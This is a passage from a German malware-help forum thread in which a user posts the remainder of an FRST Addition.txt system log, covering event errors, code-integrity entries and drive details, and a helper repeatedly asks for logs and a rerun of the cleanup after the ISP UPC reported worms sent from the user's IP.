Error: (07/31/2017 08:18:31 PM) (Source: IObitLiveUpdate.exe) (EventID: 0) (User: )
Description: Event-ID 0

Error: (07/31/2017 08:05:46 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (07/31/2017 08:05:37 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Lost_Viking · 01.08.2017, 14:51

<<<<<<Da die Datei Addition zuviele Zeichen hatte, hier der Rest

Code:

ATTFilter

Systemfehler:
=============
Error: (08/01/2017 12:57:41 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 und der APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (08/01/2017 12:32:03 PM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/01/2017 12:32:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.


CodeIntegrity:
===================================
  Date: 2017-07-28 18:15:03.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-28 18:15:02.562
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-05 21:28:31.069
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 13:12:31.840
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-06 20:55:49.642
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:43:22.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:06:11.606
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:40:43.841
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:18:44.959
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz
Prozentuale Nutzung des RAM: 49%
Installierter physikalischer RAM: 16279.21 MB
Verfügbarer physikalischer RAM: 8160.43 MB
Summe virtueller Speicher: 18711.21 MB
Verfügbarer virtueller Speicher: 6920.27 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:62 GB) NTFS
Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3666.74 GB) NTFS
Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2639.82 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=449 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================

01.08.2017, 12:31	#6
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	UPC meldet: Virus, würmer werden über meine IP versendet Auf den Briefmarken soll man bitte wer etwas erkennen? Was sollst du bei MBAR tun, wenn es fündig wurde? __________________ --> UPC meldet: Virus, würmer werden über meine IP versendet

01.08.2017, 13:07	#8
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	UPC meldet: Virus, würmer werden über meine IP versendet Äh und schon wieder hast du nicht richtig gelesen Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess. __________________ Logfiles bitte immer in CODE-Tags posten

01.08.2017, 13:52	#10
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	UPC meldet: Virus, würmer werden über meine IP versendet ok ich will immer das Log dazu sehen geht FRST jetzt? __________________ Logfiles bitte immer in CODE-Tags posten

01.08.2017, 13:56	#12
cosinus /// Winkelfunktion /// TB-Süch-Tiger™	UPC meldet: Virus, würmer werden über meine IP versendet und das Log dazu??! __________________ Logfiles bitte immer in CODE-Tags posten

UPC meldet: Virus, würmer werden über meine IP versendet

Log-Analyse und Auswertung: UPC meldet: Virus, würmer werden über meine IP versendet